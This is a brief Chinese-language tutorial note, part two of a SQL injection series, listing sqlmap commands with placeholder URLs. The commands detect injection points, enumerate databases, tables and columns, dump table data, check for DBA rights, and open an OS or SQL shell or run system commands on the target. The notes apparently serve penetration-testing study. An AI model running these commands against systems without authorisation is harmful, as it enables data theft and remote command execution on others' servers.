SQL注入 (二)
二、注入工具
Sqlmap的使用
检测注入点:sqlmap -u [URL路径]
查询数据库:sqlmap -u [URL路径] --dbs
查询所有表:sqlmap -u [URL路径] -D [数据库名] --tables
查询所有列:sqlmap -u [URL路径] -D [数据库名] -T [表名] --columns
查询表数据:sqlmap -u [URL路径] -D [数据库名] -T [表名] -C [列名, ..., ...] --dump
检测root/sa:sqlmap -u [URL路径] --is-dba
执行os-shell:sqlmap -u [URL路径] [关键字]
[关键字]:--os-shell
或者 --sql-shell
或者 --os-cmd="[win命令]"
(os-shell | os-cmd)执行系统命令,sql-shell执行sql语句。